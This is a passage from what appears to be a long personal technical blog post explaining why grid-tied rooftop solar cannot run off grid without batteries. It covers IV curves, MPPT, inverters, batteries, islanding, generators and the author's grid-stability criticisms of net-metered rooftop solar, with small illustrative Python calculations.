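If you want to poke at this behavior numerically, here's a small sketch using a common simplified exponential panel model.  Every number in it is hypothetical (chosen to loosely resemble the panels discussed below, not pulled from a datasheet), but it shows the shape that matters: power climbs slowly, peaks at the knee, and then falls off a cliff.

    # Toy IV-curve illustration using a common simplified exponential model.
    # All numbers are hypothetical, not from any particular datasheet.
    import math

    V_OC, I_SC = 70.0, 9.0    # open-circuit voltage, short-circuit current
    V_MP, I_MP = 58.0, 8.5    # assumed maximum power point

    # Fit the two constants of I(V) = Isc * (1 - C1 * (exp(V / (C2 * Voc)) - 1)).
    C2 = (V_MP / V_OC - 1.0) / math.log(1.0 - I_MP / I_SC)
    C1 = (1.0 - I_MP / I_SC) * math.exp(-V_MP / (C2 * V_OC))

    def panel_current(v):
        return max(0.0, I_SC * (1.0 - C1 * math.expm1(v / (C2 * V_OC))))

    # Brute-force sweep to find the maximum power point.
    watts, volts = max((v / 10.0 * panel_current(v / 10.0), v / 10.0)
                       for v in range(0, 701))
    print("max power: about %.0f W at %.1f V" % (watts, volts))

    for v in (40, 58, 64, 68, 70):
        print("%2d V -> %5.1f W" % (v, v * panel_current(v)))

A handful of volts past the knee the output is roughly halved, and at Voc it's essentially zero - that's the collapse described above.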



The curves change absolute values somewhat both with illumination and temperature.  A colder panel will produce a higher voltage, which a good MPPT controller can extract as extra watts in the winter (when you really want all the watts you can get).  Plus, there are curves over the standard 1000W/m^2 illumination you might see in certain conditions that lead to an awful lot of extra power.  When might you see that?  A vertical panel, with snow on the ground, on a bright, sunny winter day.  Also, "cloud edge" effects (the edge of certain cloud formations can focus more light on your chunk of ground than full sun).  In those conditions, a panel will produce more than rated current and voltage, and you'd better have designed for that!  I've seen north of 11A from 9A panels in the winter reflection condition.

My east facing panels, right now, are producing 1.8A at 58V. In these conditions (afternoon shade, but a partly cloudy day), they'd happily provide 1.8A at 12V, 1.8A at 24V, 1.8A at 40V, 1.8A at 60V... right up until I pass the knee in the curve. Open circuit voltage today is 70V (my little PWM controller can tell me this), so peak power is probably right about 57-60V.  And, if I were to try to pull more than 1.8A from them, the voltage would collapse. That's just what they can do right now, aimed as they are.


Swing them around to face the sun, and they're operating at 7.4A at 58V. These panels are connected with a PWM controller (pulse width modulation, or basically a switch that toggles quickly), so they always operate at whatever my battery bank voltage is. That means they're producing more watts when my bank is charging heavily (60V) than empty (48V). But that's the way I hooked them up because it's cheap and plenty good enough for my needs.  Since their peak power comes fairly close to my battery bank voltage, the (small) gains of a MPPT controller don't justify the cost on this secondary array.  But what's MPPT?

MPPT: Maximum Power Point Tracking

Look back at the diagram. The top of the power curve is called the "maximum power point" - for what should be obvious reasons. That particular voltage/current point is the absolute maximum number of watts you can get out of the panel at this particular point in time. A more sophisticated charge controller can track this point by sweeping across the range of voltage/current values and finding the maximum power. My main array of 8 panels is hooked up to a MPPT charge controller (a Midnite Classic 200, which runs around $600). If I load things up enough to get them at max power point, they're operating at about 116V/13.8A/1600W (two strings of 4 panels in series instead of one string of 2 like my morning panels). It's a good solar day.  The MPPT controller converts that power into what my battery bank (and the rest of my system) wants - about 27A at 59V.  This is the insides of a Midnite Classic 200, and it's a fairly complicated bit of circuitry (this unit can handle up to 4500W of panel on a 72V battery bank).  This is only doing the maximum power point tracking and DC-DC conversion - it's not even outputting an AC waveform!
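Just to illustrate the tracking idea, here's a toy "perturb and observe" loop against a fake, static panel curve.  It is not the algorithm any particular controller (Midnite's included) actually uses, and a real panel's curve moves constantly with sun and temperature.

    # Toy "perturb and observe" MPPT loop.  The controller nudges its operating
    # voltage, keeps going while power increases, and reverses when it drops.
    def fake_panel_power(v):
        # Crude stand-in curve peaking around 58 V, for illustration only.
        return max(0.0, 500.0 - 0.5 * (v - 58.0) ** 2)

    volts, step = 40.0, 1.0
    last_power = fake_panel_power(volts)
    for _ in range(50):
        volts += step
        power = fake_panel_power(volts)
        if power < last_power:   # overshot the peak, so turn around
            step = -step
        last_power = power
    print("settled near %.0f V, about %.0f W" % (volts, last_power))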


What happens when I don't need all that power (assuming the batteries are full)? If my AC compressor is turning, I need about 1.6kW. Shut that down, I'm pulling about 950W. Where does the excess power go?  It simply doesn't get produced in the first place.  A charge controller can restrict the energy drawn by drawing less current than the maximum power point, which lets the voltage float up towards the open circuit voltage (you could also draw more current, but that's a far less stable way to operate).  When I'm pulling 950W, my main array is running at 133V/5.1A/678W, while my morning panels make up the rest (actually, they produce what they can, and the main array makes up the rest). The system only draws as much as is actively being used.

So, going back to the curve: If I try to draw more than whatever the peak power of my panels are (in current conditions), the voltage (and power) collapses. If I tried to pull 2A out of my morning panels when they were facing east and only able to source 1.3A, the voltage would collapse to 0V and the power would drop to zero. What if I try to pull 2A out of them when they're swung out and able to produce 7.4A? Well, I can pull 2A for as long as I want.

The key here is that you cannot pull more than the maximum power from a panel - even by a little bit - without suffering a massive voltage and power collapse.  You can operate below the maximum power point easily enough, but it's hard to identify the maximum power point without sweeping through the whole range to find it.

Microinverters Versus Charge Controllers/Off Grid Inverters

A typical grid tied solar system is built with microinverters.  These are a combination MPPT tracker and inverter for each solar panel, normally in the 280-320W range, though that's creeping up with time as panel output increases.  The output from these synchronizes with the grid - typically 120VAC and 60Hz, in the US. However, they're very simple devices. They don't have onboard frequency generation - they can only work when given a voltage waveform to synchronize against. They also only work at maximum power point - that's their whole point, and when the grid is up, they're connected to what is, from the perspective of a microinverter, an infinite sink. So they sit there, finding the maximum power point, and hammering amps out onto whatever waveform the grid is feeding them.


They also, because they're feeding the grid, have zero surge capability. A 320W microinverter can never source more than 320W, which is fine, because the panel will generally not produce more than 320W. There are conditions where it can, but they're unlikely for roof mounted panels (a very cold, very clear winter day would seem like a case, but the panels aren't typically aligned to take advantage of low winter sun).  When the inverter can't process everything the panel could produce, it's called "clipping," and it's really not that big a problem as long as it's not many hours a year.

But, because of these requirements for the operating environment, microinverters are significantly cheaper to build.  They just need to be able to find max power point and shove that power onto an existing waveform.

An off grid system typically has two different devices - a charge controller (the Midnite Classic shown above) and an inverter (sometimes more than one of each in parallel).  These are separate devices, and cost a good bit more than a microinverter of comparable power.  But, they also work with the battery bank, and have to deal with more amps. A 320W microinverter will typically consume around 10A on the DC side and output about 2.5A on the AC side. My charge controller tops out around 75A on the battery side, and my inverter can pull 125A from the battery bank (peak current).  I've got a massive low frequency inverter that weighs about 40 lb (for stationary use, I consider power density in inverters an anti-feature - I'd rather have a massive inverter than a tiny one, because they tend to last a lot longer).  My inverter is rated at 2kW, but can source up to 6kW briefly if needed.
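For a quick sanity check on those current figures (the panel and bank voltages below are assumed nominal values, not measurements):

    # Rough current sanity checks for the figures above, using assumed
    # nominal voltages (real operating voltages wander around quite a bit).
    checks = [
        ("320 W microinverter, DC side (~32 V panel)", 320.0 / 32.0),
        ("320 W microinverter, AC side (120 VAC)", 320.0 / 120.0),
        ("2 kW inverter, continuous, 48 V nominal bank", 2000.0 / 48.0),
        ("6 kW inverter surge, 48 V nominal bank", 6000.0 / 48.0),
    ]
    for label, amps in checks:
        print("%-48s ~%5.1f A" % (label, amps))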


Some of the newer systems use a high voltage DC coupled setup - this is how the DC Powerwalls work (which was the Powerwall 1, and was advertised for the Powerwall 2, but then cancelled). For this, you have a very high voltage string of panels (typically 400VDC, either from panels in series or from power optimizers, which are basically a microinverter that outputs high voltage DC), the battery bank hangs on that bus, and the inverter swallows 400VDC and puts out AC.  This works better for higher power systems, but it's not a very common off grid layout.

Batteries

You need batteries in an off grid system for two reasons: Energy storage is the obvious reason, but they also cover peak power demands. Lots and lots of things in a typical home draw far, far more power at startup than they do while running. Anything with a motor is likely to do this, and compressors are particularly bad about this (fridges, freezers, air conditioners, etc). Pretty much any semi-inductive load is going to be a pain to start in terms of current requirements.  Again, using data I have handy, my air conditioner pulls about 700W running, but it pulls somewhere around 2kW, very briefly, when starting. My system is designed for this sort of load (my inverter is a 2kW unit with a 6kW peak surge current capability), but you have to be able to handle that, or the system won't work. If you have purely resistive loads, there's still a startup surge - a typical incandescent bulb draws more current when it's cold, because its resistance rises with temperature (you can radically extend the life of incandescent bulbs by putting a negative temperature coefficient resistor in series with them, and this was a popular trick with aircraft landing lights before LEDs got bright enough).  This is another reason off grid inverters tend to be large and heavy - they have to be able to provide that peak power.  Most off grid inverters have a peak power delivery of 2-3x their sustained power delivery, and mine is on the high end, peaking at 3x rated.
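Here's the sort of arithmetic that implies when sizing an inverter.  The loads are hypothetical, loosely modeled on the examples above; they're not a real load survey.

    # Will the inverter ride through the worst-case startup?  Hypothetical
    # loads, loosely modeled on the examples above (a compressor that runs at
    # ~700 W but needs ~2 kW to start, on top of whatever is already running).
    INVERTER_CONTINUOUS_W = 2000
    INVERTER_SURGE_W = 6000

    running_loads_w = {"fridge": 150, "freezer": 120, "lights and misc": 300}
    compressor_start_w = 2000   # vs. ~700 W once it's spinning

    base_load = sum(running_loads_w.values())
    worst_case = base_load + compressor_start_w

    print("steady load: %d W (continuous limit %d W)" % (base_load, INVERTER_CONTINUOUS_W))
    print("worst-case start: %d W (surge limit %d W)" % (worst_case, INVERTER_SURGE_W))
    if worst_case > INVERTER_SURGE_W:
        print("undersized: the startup surge will trip the inverter")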


Worth noting on batteries: They suffer age-related degradation as well as cycle-based degradation. You cannot keep any battery alive forever, even if you don't use it. Lead acid chemistries (flooded, sealed, AGM, whatever) are rarely good past about 10 years, though if you were to keep them really cold you could probably manage it (some of the industrial cells are rated for 15 years, but they're quite a bit more expensive). Lithium... eh.  It supposedly lasts longer, but I treat accelerated lifespan tests as a general guideline to compare batteries instead of full truth.  I make a lot of money on dead lithium, and there's a lot of ways to kill them.  They also require heating in the winter or you'll get lithium plating while charging (which is also a way to kill the capacity).

Let me offer a general guideline on batteries: Any time you put any sort of battery into a power system, the system will never "pay for itself."  There may be specialty cases where this isn't true, but it's a solid first order approximation you should be aware of.  Off grid power is insanely expensive.

Off Grid Without Batteries

Now, how does all of this relate to off grid use without batteries?

If you have a typical grid tied system (microinverters or normal string inverters, so easily 95+% of installed rooftop solar), the system is technically incapable of running off grid (without additional hardware). There's no waveform to sync with, and the inverters cannot produce their own waveform.  Also, they cannot operate at a reduced power output (this is more a side effect of the firmware, but it's true of the vast majority of ones out there). So they can't produce less power than the panels are creating at the moment, and they can't produce more.  And they can't make a valid AC waveform out of it.  You can see how this might be a problem.

If you want off grid capability from a microinverter system, you need what's called an "AC coupled system." This involves a battery bank (uh oh), and an inverter/charger that can suck power from the home's AC grid, as well as deliver it. You generally can't size this to use the whole roof, as a 10kW charger/inverter and a battery bank that can handle that sort of charge rate are really expensive. Basically, this system provides a waveform for the microinverters, sucks excess power, and eventually shuts the microinverters off (usually by pushing frequency out of spec for them). There theoretically exists a setup that can tell the microinverters to back off a bit, and with the newer UL specs, that should be easier with some of the improved ridethrough curves, but... it's complex, and nobody really does this. Generally, you only couple some of the solar panels to the AC coupled setup, because it makes a smaller charger/inverter possible. So you may AC couple 4kW of a 12kW system.

The only real way to get off grid power without batteries is to go with an inverter that has an emergency outlet.  Some of the SMA inverters support this (they call it Secure Power Supply) - you feed the whole rooftop array into them, and they can, if the sun is shining, provide 1.5kW or so to a dedicated outlet - assuming there's enough solar power. So, from an 8-10kW array, on a sunny day, you can get 1.5kW by operating well below the peak power point. If the array can't keep up with current demand (a cloud goes over), the outlet shuts down. It's better than nothing, but this is just about the only way you can get battery-free off grid power. To get any sort of stable battery-free power, you have to run the panels well, well below peak power (30-50% of peak is as high as you can really run), and even then, you have a horrifically unstable system. If the array power briefly drops below demand (perhaps an airplane has flown over), you shut down the entire output for a while. Hopefully your devices can handle intermittent power like this. If the array can source 1300W at the moment and a compressor tries to draw 1301W while starting, you collapse the array voltage and shut down the outlet.  That's really hard on compressors (and everything else attached to the outlet).

If, as some nutjobs prefer, you want sustained off grid running for most of the house, you can design a system with batteries that's intended for this sort of use. I plan to build this, eventually. I'll have 8-12kW of panels on the roof, feeding into a few charge controllers. These will feed into a moderately sized battery bank under my house, and will be coupled to a large inverter that supports grid tied production as well as standalone use (probably an Outback Radian 8kW unit). I'll have most of the house downstream of the inverter, so I can run everything I care about off the inverter - I'll lose some loads like the heat pump backup coils, possibly the stove, but the rest of the house will work, and I'll have enough surge capacity to do things like run the well pump and the air conditioner.  I don't expect this system to ever "pay off" in financial terms, but I value stable, reliable power, and a test lab for this sort of operation.

Or you can separate your backup power from your solar, which I'll talk about a bit later.

So... hopefully that's a bit of a technical overview of how things work. I assure you, most of the furor over this is related to how systems are installed, not "Meanie Power Company Being Evilly Evil."

"Islanding"

One term you'll hear tossed about is "islanding."  This refers to a chunk of the power grid (possibly a single house) that has power while the rest of the local grid is dead.  It's common to hear "anti-islanding" blamed for why a home's solar can't produce power when the grid is dead.  Lineworker safety is usually mentioned in the next sentence.

What this means, simply, is that a local generating system cannot (legally) feed into a dead section of power grid.  For a home power system, this means that unless you have a specific mechanism for disconnecting the home from the power grid (typically called a "transfer switch"), you cannot power the local home circuits from solar or generator.

Now, that said, it's really less of an issue than it's made out to be.  Backfeeding the power grid, according to some lineworkers I've talked to, is really not a big concern for two reasons. First, lineworkers assume lines are live until proven otherwise.  And, second, no residential system is going to successfully backfeed a large dead section of grid.  The grid without power looks an awful lot like a dead short, so the microinverters or string inverters or generator or whatever will instantly overload and shut down. It's in the regulations, but it's really not that big a concern from a technical/safety perspective.

But, if you haven't explicitly set your system up to support islanded operation with a transfer switch and battery, your solar won't power your house with the grid down.

It's Not Power Companies Being Evilly Evil - It's Homeowners Being Cheap

Why have I written all this?  To explain (hopefully) that the reason most solar power systems won't work off grid has literally nothing to do with power companies being evil and demanding that you buy their power.  It has everything to do with the system not being designed to run off grid.  Why are they designed that way?  Because it's cheaper.  Period.  A microinverter based system is substantially cheaper than anything with batteries (which will need regular replacement), and that's what people get installed when they want a reasonably priced bit of rooftop solar to save money on their power bill.

If you want to get a rooftop solar system that powers your home with the grid down, you can do it!  The hardware is out there.  But such a system will be significantly more expensive than a normal grid tied system, and it will likely never "pay off" in terms of money saved.  That's all.

So stop blaming the power companies for homeowners buying a grid tied system (because it's cheap) and then complaining when it won't run off grid.  That's like complaining that a Mazda 3 won't tow a 20k lb trailer.

The Cheap Path to Backup Power

Now, if you want emergency backup power, and your goal isn't to spend a comically large sum of money on a system like I'm designing (the ROI on my system design is "never" if you don't value sustained off grid power use), the proper solution is a generator. I highly, highly suggest a propane (or natural gas, if you have that) generator - it's so much easier to store propane than gasoline without it going bad. Ten year old propane is fine. Ten year old gasoline is a stinky, gummy varnish.  Says the guy with an extended run tank for his gasoline generator.


A generator and transfer switch is the right option for almost everyone interested in running through a power outage.  The solar feeds into the grid side of the transfer switch, the generator feeds into the house side.  When the power goes out, flip the transfer switch, light the generator, and go.  Or, if you get really fancy, you can get an automatic transfer switch that will even start the (expensive) generator for you!

This doesn't give you uninterrupted power (there's still a blip when the power sources change), but it's far, far cheaper than putting your house on a giant inverter and adding batteries.

Can't Microinverters Sync to a Generator?

If the microinverters need a waveform to sync with, couldn't you create that waveform with a generator or a tiny little inverter and have the rooftop units provide the rest of the power?

Unfortunately, no.  A microinverter generally won't sync to a generator - and if it could, it wouldn't work anyway. Most fixed RPM generators (typically the cheaper open frame generators, running at 1800 or 3600 RPM) put out such amazingly terrible power quality that a microinverter will refuse to sync against them. Put one on a scope if you have one. They're bad. It's very nearly electronics abuse to run anything more complicated than a circular saw from them.

You can perhaps get the microinverters to sync against an inverter generator, but then where will the power go? Let's say you've got a 3kW Honda and an 8kW array - not an uncommon setup. You start the generator, the freezers and such start up, pull 1500W. The microinverters sync, and with the sun, start trying to dump 4-5kW onto the house power lines. The Honda will back off, since it looks like a load reduction, but you've got 4000W of microinverter output trying to feed 1500W of load, and the microinverters won't back off. What they'll do is drive voltage or frequency high, shut down, and then the Honda has to pick up the 1500W load instantly. And you'll do this over and over. If you don't destroy the generator, you'll probably destroy the loads. It just doesn't work.
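
To make the mismatch concrete, here's a rough back-of-the-envelope sketch of that scenario in Python.  The numbers are the ones from the paragraph above; the behavior is deliberately simplified and isn't a model of any particular generator or microinverter.

```python
# Rough power-balance sketch of the "3 kW inverter generator + 8 kW of
# microinverters" scenario above.  Numbers and behavior are simplified
# illustrations, not a model of any specific hardware.

house_load_w = 1500        # freezers and such
generator_max_w = 3000     # small inverter generator
solar_output_w = 4500      # what the microinverters try to push with good sun

# The microinverters just dump whatever the sun gives them; they don't
# follow the load.  On a small island, the surplus has nowhere to go.
surplus_w = solar_output_w - house_load_w
print(f"Surplus with nowhere to go: {surplus_w} W")   # ~3000 W

if surplus_w > 0:
    # Voltage/frequency climb until the microinverters trip offline,
    # and the generator has to pick up the whole load instantly.
    print(f"Generator step load: 0 W -> {house_load_w} W, over and over.")
```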

The AC coupled systems solve this by saying, "Well, I'll just pull power into the battery bank until it's full." So they'll let 1500W of that output from the rooftop units feed the freezers, and pull the other 2500W into the battery bank, so things are stable. And then shut down the microinverters by pushing frequency out of spec when the batteries are full.

UL 1741 SA compliant inverters might be able to be tricked into partial output, but I don't think that's likely to be very stable for long.

Small Scale Battery Backup

Another valid option for backup power (as shown in the title picture) is some sort of small battery box (with or without solar).  I built a 1kWh power toolbox (with solar capability) last summer, and that can run at least some useful loads if we lose power.  Goal Zero makes some nice equipment in this realm, if somewhat pricey.  Though, really, my "power is out for a long while" plan involves my generator and some extension cords, for now.

Power Grid Stability and Rooftop Solar

While I'm on the topic of residential solar, I'd like to talk a bit about why I'm not a huge fan of it, as commonly implemented.  This often surprises people who assume I have to be massively pro-solar (based on my off grid office and how much I write about it), but I don't think that residential rooftop solar is a particularly good idea, and I'm a far bigger fan of utility scale solar deployments ("Community Solar" and large commercial solar farms).  I'm genuinely excited to find new solar farms when I'm out flying, and they keep popping up like weeds in my area.  Most of the utility scale solar out here is single axis trackers, which help with evening out power production throughout the day (and, importantly, help with production in the morning and evening).  They're awesome, and I'd love to tour one of the plants one of these days.  If you're a solar company in the Treasure Valley, I promise I'll be very impressed if you take me on a tour!

Why am I not a huge fan of rooftop solar?  I'll dive into that shortly, but, fundamentally, rooftop solar is a bad generator.  It tends to be focused on maximizing peak production (at the cost of useful production), because the incentives are for peak kWh, not useful kWh.  And, worse, rooftop solar is a rogue generator.  The power company has no control over the production (which peaks at solar noon and goes away whenever there's a cloud), and the power is the equivalent of sugar - empty VARs.  I think the power grid is pretty darn nifty, and I'm a huge fan of keeping it running.  Rooftop solar, as currently implemented, is really very much at odds with a working power grid.

The Grid as Your Free Battery

Typically, rooftop solar is on some variety of "net metering" arrangement.  This means that if you pump a kWh of energy onto the grid, you can pull a kWh off.  You get to use the grid as your free, perfect, seasonal battery - which is an absolutely stunning, amazing, sparkling deal for the homeowner.  No battery technology out there does this, except the power grid!

It's kind of a crap deal for the power companies, though.  In exchange for you putting a kWh onto their grid, whenever your system happens to have some excess, you get to pull a kWh off their grid - for free - whenever you happen to need it.  This is the sort of arrangement you put in place when the only people who have rooftop solar are the kooks (say, the 80s or 90s), and you can safely ignore them.  It does NOT work well when more and more people have rooftop solar, and are demanding that the grid bend to their needs, not the needs of grid stability.  I'll talk about this more in the grid maintenance section.
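
If it helps, here's the arithmetic behind the "free battery" complaint, sketched in Python.  The retail rate is an assumed round number; the "energy only" value is the roughly $0.02-$0.04/kWh discussed in the grid maintenance section below.

```python
# Toy net-metering arithmetic.  The retail rate is an assumed round
# number; the "energy only" value is the ~$0.02-$0.04/kWh discussed in
# the grid maintenance section below.

exported_kwh = 500        # surplus pushed onto the grid around solar noon
imported_kwh = 500        # pulled back off the grid at night and in winter

retail_rate = 0.10        # $/kWh the homeowner normally pays (assumed)
wholesale_energy = 0.03   # roughly what the energy alone is worth

# Net metering cancels imports against exports one-for-one:
bill = (imported_kwh - exported_kwh) * retail_rate
print(f"Homeowner's energy bill: ${bill:.2f}")            # $0.00

# But the utility only avoided the energy cost, not the grid costs:
credit_given = exported_kwh * retail_rate                 # $50.00
energy_value = exported_kwh * wholesale_energy            # $15.00
print(f"Utility credited ${credit_given:.2f} for ${energy_value:.2f} worth of energy.")
```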

Inertia/Frequency Stability/Empty VARs/Restart Behavior

A related issue for grid stability is the lack of inertia (or synthetic inertia) in residential solar installs.  This is getting slightly better with the UL 1741 SA listed inverters, but they still only fix it in one direction.

What's inertia, in the context of power systems?  Literally that - traditionally it's been provided by the inertia of the large spinning generators, their turbine systems, gearboxes, etc.  Rotational inertia!  Without diving into the details, this provides the first order response to grid load changes by countering frequency changes mechanically.  If there's a sudden spike in load (or a generation station trips off), the initial response by the grid is that the frequency tries to drop (as more power is demanded of the remaining generators).  The drop in frequency is caught by the plant throttles that add more steam (if available) to the turbines, and then the grid tries to add capacity to seek the correct frequency.
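
For the curious, the classic "swing equation" captures that first order effect.  Here's a minimal sketch with made-up numbers for the system size, the inertia constant, and the size of the trip; it just shows that less spinning iron means frequency falls faster for the same disturbance.

```python
# Minimal swing-equation sketch: initial rate of change of frequency
# (ROCOF) after a sudden loss of generation.  H, the system size, and
# the size of the trip are made-up illustrative numbers.

f_nom = 60.0            # Hz
s_base_mva = 10_000.0   # aggregate rating of the online generation
trip_mw = 500.0         # generation suddenly lost (5% of the system)

def initial_rocof(h_seconds):
    """Classic swing equation: df/dt = -f0 * dP / (2 * H * S)."""
    return -f_nom * trip_mw / (2.0 * h_seconds * s_base_mva)

for h in (6.0, 3.0, 1.0):   # lots of spinning iron ... very little
    print(f"H = {h:3.0f} s  ->  initial df/dt = {initial_rocof(h):+.3f} Hz/s")

# Less inertia means the same trip pulls frequency down faster, leaving
# less time for the plant governors to add steam before under-frequency
# protection starts tripping other things offline.
```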

Microinverters generally don't offer any grid stability services.  They simply match what's present - and, worse, most of the deployed ones trip off if the frequency gets too far away from spec.  So, if the grid frequency drops from a high load situation, the inverters may trip off and reduce generation even more.  It's a positive feedback loop, and not a good one.

This sort of stability-free generation doesn't matter as much if there are only a few people with rooftop solar, but it's the sort of thing that leads to emergent instability if there are a lot of people with solar.

The recent UL 1741 SA tests (and related IEEE 1547 standard updates) address this significantly by radically increasing the ride-through windows and allowing for curtailed output if the frequency or voltage is too high, but residential inverters still only operate in the "curtail output" side of the standard.  They can't (won't?) do something useful like operate at 80% of maximum power, so they can respond instantly to a lowered frequency on the grid by adding power.  Solar can respond nearly instantly to a load demand, but only if it's operating below the maximum power point to start with.
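
As a rough illustration of the "curtail on high frequency" side of that behavior, here's a frequency-watt curve sketched in Python.  The breakpoints are made up; the real settings come out of the standard and the local utility's requirements.

```python
# Illustrative frequency-watt curtailment, in the spirit of the
# UL 1741 SA / IEEE 1547 high-frequency response.  The breakpoints are
# made up for illustration, not taken from the standard.

def curtailed_output_w(freq_hz, rated_w, start_hz=60.5, zero_hz=62.0):
    """Full output at or below start_hz, linear ramp down to zero at zero_hz."""
    if freq_hz <= start_hz:
        return rated_w
    if freq_hz >= zero_hz:
        return 0.0
    return rated_w * (zero_hz - freq_hz) / (zero_hz - start_hz)

for f in (60.0, 60.5, 61.0, 61.5, 62.0):
    print(f"{f:.1f} Hz -> {curtailed_output_w(f, 8000):5.0f} W")

# Note there's no mirror image for low frequency: the inverter is already
# at its maximum power point, so it has no headroom to add power.
```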

But, even with those changes, there's still the potential for some sort of emergent oscillation to arise.  At some point, there will be little enough effective inertia on some grid segments that something quite interesting will happen, and I expect rooftop inverters to be significantly at fault from how they respond to some unexpected trigger pattern.

Power Production/Duck Curve Issues

Related, rooftop solar tends to be aimed as close to due south as possible, to maximize peak production.  That maximizes total power generated, but it doesn't maximize the grid utility of the power.  Peak demand tends to be in the morning and evening, and south-aimed solar doesn't help with this.

If you've paid attention to solar, you've seen the "duck curve" in various articles.  It relates to the reduced demand on generating plants during the middle of the day, and the increasingly brutal ramp rate (rapid changes in power plant output) to deal with the increase in evening load, right as the rooftop solar is dropping off.  Since the utility has no control over individual rooftop inverters, they basically have to "just deal with it."  This is part of why we're seeing an increase in natural gas turbine plants - they can load follow better than other plant designs (including nuclear).
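
Here's a toy net-load calculation that shows the shape of the problem.  The demand and solar curves are made-up illustrative numbers, not real utility data.

```python
# Toy "duck curve" sketch: hourly demand minus rooftop solar, and the
# resulting evening ramp.  All numbers are made-up illustrative shapes,
# not real utility data.

demand_mw = [600, 580, 570, 570, 600, 700, 850, 950, 900, 850, 820, 800,
             790, 780, 790, 820, 900, 1050, 1100, 1050, 950, 850, 750, 650]
solar_mw  = [0, 0, 0, 0, 0, 0, 20, 80, 180, 280, 350, 390,
             400, 380, 330, 250, 150, 60, 10, 0, 0, 0, 0, 0]

net_mw = [d - s for d, s in zip(demand_mw, solar_mw)]
ramps = [net_mw[h + 1] - net_mw[h] for h in range(23)]
worst = max(range(23), key=lambda h: ramps[h])
print(f"Steepest ramp: +{ramps[worst]} MW between {worst}:00 and {worst + 1}:00")
# The conventional plants have to cover that ramp, right as the rooftop
# solar is dropping off for the evening.
```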

A utility scale solar plant can help resolve this in multiple ways.  Most of them tend to be on single axis trackers, which helps extend their production into the morning and evening - at the cost of peak production in the middle of the day.  In addition, a utility solar plant can bid into various grid services, can operate curtailed (less than 100% output to provide headroom for frequency stability, or to provide stable output despite clouds), and generally is far more useful to the grid than rooftop solar.  And, if you want to pair storage with it, it can behave much as a traditional power plant in terms of power bidding.

Utility Grid Costs/Maintenance

Finally, rooftop solar (with net metering) leads to a push of grid maintenance costs away from those who have rooftop solar, onto those who don't.

Net metering, as I explained above, is using the grid as an ideal, free, battery.  And it's the free part that causes problems.

I touched on demand charges a few months back when I looked at Tesla's Megachargers and operating costs, but for any sort of serious load (industrial/commercial use), your power bill consists of two separate items: Energy charges, and demand charges.  Energy charges are per-kWh used, and are, by residential standards, absurdly cheap.  In the range of $0.04/kWh or less "cheap."  But, separately, you pay demand charges - which are per-kW charges on your peak demand for the month (usually measured over a 15 minute or one hour window).  If you use very little energy overall, but pull 1MW for an hour, you'll be paying out the wazoo in demand charges.
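
A quick arithmetic sketch of that "little energy, huge peak" case.  The energy rate is in the range from the text; the $/kW demand rate is an assumed illustrative number.

```python
# Two-part commercial bill sketch for the "1 MW for an hour" example.
# The energy rate is in the ~$0.04/kWh range from the text; the demand
# rate is an assumed illustrative number.

energy_used_kwh = 1000     # 1 MW for one hour, and very little else all month
energy_rate = 0.04         # $/kWh
peak_demand_kw = 1000      # that one hour sets the monthly peak
demand_rate = 12.00        # $/kW of monthly peak demand (assumed)

energy_charge = energy_used_kwh * energy_rate    # $40
demand_charge = peak_demand_kw * demand_rate     # $12,000
print(f"Energy charge: ${energy_charge:,.2f}")
print(f"Demand charge: ${demand_charge:,.2f}")
# Tiny energy use, enormous bill: the peak kW is what you're paying for.
```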

The reason for this is that energy, on the grid, is actually quite cheap.  The actual cost of a kWh on the grid is typically around $0.02-$0.04.  The rest of the rate (for residential rate schedules) is the demand charge, just woven into the per-kWh rate.  Generally, you'll see some level at which the cost per kWh goes up, which is effectively the same as demand charges increasing (because someone who uses 2MWh/mo is going to need a bigger feed and more supporting grid hardware than someone who only uses 200kWh/mo).

When you are producing on a residential schedule (which is what net metering effectively is), you break the assumptions bound into the rate schedule, quite to your benefit.  Someone with rooftop solar who is exporting enough to the grid to null out their bill is using the grid essentially for free, despite making heavy use of the grid for both exporting their excess (when they happen to have it) and making up the lack (whenever they want it).

With demand charges, it would matter less, as you'd be separating out your grid use from your energy use, but right now, with net metering, the deal is this: "I'll ship you power whenever I have surplus, you give me full rated power whenever I want it, you have no control over it, and I pay you nothing for using your power grid."

This is not a particularly good way forward.

Closing Thoughts

Several thousand words later, hopefully you understand better why solar panels don't magically let you use power without the grid.  And, hopefully, you can now communicate this any time you see that sort of nonsense showing up on the internet.  Or link them here.  Whichever.

If you want affordable backup power, just buy a generator and wire in a transfer switch.

Let me know in the comments if there are areas you find unclear, and I'll attempt to clarify them.